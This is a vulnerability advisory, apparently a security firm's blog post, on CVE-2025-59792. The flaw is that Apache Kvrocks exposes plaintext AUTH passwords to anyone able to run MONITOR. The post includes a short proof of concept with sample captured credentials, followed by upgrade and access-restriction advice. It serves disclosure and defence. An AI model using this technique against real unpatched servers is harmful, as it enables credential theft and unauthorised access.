← Back to Blog
MediumCVSS 5.3Information DisclosureCVE-2025-59792

Published 2025

Apache Kvrocks Credential Exposure via MONITOR

BugBunny.ai discovered that Apache Kvrocks exposed plaintext credentials through the MONITOR command. Any user with MONITOR access could capture AUTH command arguments, including passwords, as other users authenticated to the server.

Responsibly DisclosedView CVE →

TL;DR

Plaintext passwords visible in MONITOR output

Impact:Credential theft for any user authenticating to the server
Vector:MONITOR command captures AUTH arguments
Affected:Kvrocks v1.0.0 - v2.13.0
Status:Fixed in v2.14.0 - AUTH args now redacted

Proof of Concept

# Connect as any authenticated user (or unauthenticated if no requirepass)
redis-cli -h kvrocks-host -p 6666

# Start monitoring all commands processed by server
> MONITOR
OK

# Wait for admin to authenticate or client to connect with credentials...
# Vulnerable output (v1.0.0-v2.13.0):

1706000000.000000 [0 10.0.0.5:54321] "AUTH" "SuperSecretAdminPassword123!"
1706000001.000000 [0 10.0.0.6:54322] "AUTH" "default" "AnotherUserPassword456!"

# AUTH commands with plaintext passwords visible to MONITOR!
# Any user with MONITOR access can capture credentials

# Fixed in v2.14.0: AUTH command arguments are now redacted
# 1706000000.000000 [0 10.0.0.5:54321] "AUTH" "(redacted)"

Mitigation

  • Upgrade to Apache Kvrocks v2.14.0 or later
  • AUTH command arguments are now redacted in MONITOR output
  • Restrict MONITOR access to trusted administrators only

Credits & Disclosure

Identified by BugBunny.ai and responsibly disclosed to the Apache Kvrocks maintainers.

Reporter: BugBunny.aiCVE-2025-59792
CVE-2025-59792: Apache Kvrocks Credential Exposure | BugBunny.ai | BugBunny.ai